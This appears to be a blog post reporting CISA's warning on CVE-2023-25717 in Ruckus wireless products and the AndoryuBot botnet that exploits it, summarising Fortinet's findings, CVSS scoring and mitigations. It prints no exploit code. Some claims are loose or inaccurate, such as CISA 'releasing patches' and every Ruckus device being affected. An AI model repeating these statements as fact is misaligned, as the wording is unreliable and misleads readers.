CISA known for its positive impact in the cybersecurity industry has warned about remote code execution on ruckus wireless devices.
Few months ago, CISA released patches on exploit found in ESXI servers and in last month they released a defense tool known as the Untitled goose tool, and that is one of the numerous of their vast contribution in the cybersecurity industry.
The company reported a CVE-2023-25717 that has CSRF and RCE which is vulnerable to multiple Ruckus wireless products.
As reported, the vulnerability affects all ruckus wireless devices, which enables a threat actor to execute malicious codes remotely and gain access to wireless devices that are still exposed to such vulnerabilities.
According to FortiGuard Labs, it is noticed a botnet using the socks protocol being distributed through the Ruckus vulnerable devices. The botnet was discovered to be AndoryuBot, which was first reported in February, 2023.
It has the capability of causing a DDOS (Distributed-Denial-of-Service) using different protocols while communicating with a C2-server (Command-and-Control Server) via the SOCK5 proxies. IP signatures discovered, shows the trigger counts (the botnet distribution and version between mid-April).
The malware exploits the weakness found in the Ruckus Wi-Fi devices.
IPS (Intrusion Prevention System) Signatures
Image source: Fortinet
MODE OF INFECTION:
The Mode of infection of the AndoryuBot occurs by threat actors targeting the Ruckus wifi vulnerability to gain access to the device. The botnet, then further downloads a script to further propagate.
According to Fortinet:
"The AndoryuBot Variant in their analysis shows that the targets occur in certain architectures: arm, m68k, mips, mpsl, sh4, spc, and x86. The file was saved under the name “Andoryu”, and that is how the campaign name was derived."
The script downloads using the file-extension curl. Although the script has “. ppc” in the script, instead of a valid file execution, the link contains the string “invalid file bixxh axx boi”
The Andoryu downloading script
Image source: Fortinet
The botnet is spread via unauthenticated HTTP GET request as shown in the code below, which then returns the admin information such as the username, password, and IP address upon successful compromise, the device is added to a zombie that is designed to launch a DDOS attack.
The Andoryu downloading script
Image source: cybir.com
The threat actors in order to secure their presence receive payments to use their botnet services via cashApp and cryptocurrencies such as bitcoin
The Andoryu downloading script
Image source: Fortinet
The admin panel is accessed through RCE (Remote Code Execution) via an unauthenticated HTTP GET request.
The Ruckus wireless Admin Panel
Image source: Cybir.com
The proof of concept on the mode of attack, was reported by Ken Pyle, a CYBIR partner, in which he disclosed various strategy that the threat actor uses to exploit the vulnerable Wi-Fi device.
THE SEVERITY SCORE:
The CVSS version 3.X , shows the vulnerability has a Base Score :9.8 which is a highly critical vulnerability. The attack vector metric is: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, this explained in the image below:
Severity score breakdown and analysis
Image source: nvd.nist.gov
CISA ISSUING BOD 22-01 TO FCEB:
CISA issuing BOD 22-01 to Federal Civilian Executive Branch (FCEB) agency to provide a security update on the identified vulnerability by due date in order to prevent FCEB networks from active threats. Information about the BOD 22-01 applies to only FCEB agencies
REMEDY AND SOLUTION FROM BEING INFECTED WITH ANDORYU:
According to Fortinet protection, the malware can be detected and blocked from access by using FortiGuard Antivirus. The malware signature is detected as: ELF/Andoryu.CBN! tr
The antivirus service is said to be supported by FortiGate, FortiMail, FortiClient, and FortiEDR, which Fortinet Antivirus engine is a part of the various solutions. They further said users of the antivirus software should run current Antivirus updates to stay protected.
They further released IPS (Intrusion Prevention System) signatures to take-charge in protecting their customers from the threat contained in the exploit list.
Put your comments below in the comment section on your thoughts about this.
Error stating Ken Pyle from CommScope, he is a Partner at CYBIR.
Our team will make the necessary correction. Thank you